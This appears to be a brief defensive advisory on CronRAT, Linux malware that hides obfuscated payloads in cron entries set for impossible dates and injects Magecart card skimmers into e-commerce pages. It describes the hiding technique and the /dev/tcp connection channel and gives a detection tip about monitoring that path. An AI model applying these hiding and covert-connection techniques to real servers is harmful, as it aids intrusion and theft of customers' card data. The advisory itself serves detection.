How can we help?
A strain of malware has been observed using a new technique to hide code. The CronRAT malware hides its payloads in the cron tab (Linux’s task scheduler). However, unlike a traditional scheduled task, CronRAT entries use non-existent dates (such as February 31st) to prevent the task from ever being triggered. The payload is stored in the name of the task, hidden behind layers of obfuscation.
Linux servers infected with CronRAT were seen to be injecting Magecart payloads into their webpages that could then steal credit card info from users of the site.
Check the contents of /etc/cron
Linux eCommerce servers
Containment, Mitigations & Remediations
The Remote Access Trojan (RAT) connects over TCP using the little-known Linux kernel feature that allows TCP connections via file. A good detection would be to monitor for use of anything under ‘/dev/tcp/’
Indicators of Compromise
T1564 – Hide Artifacts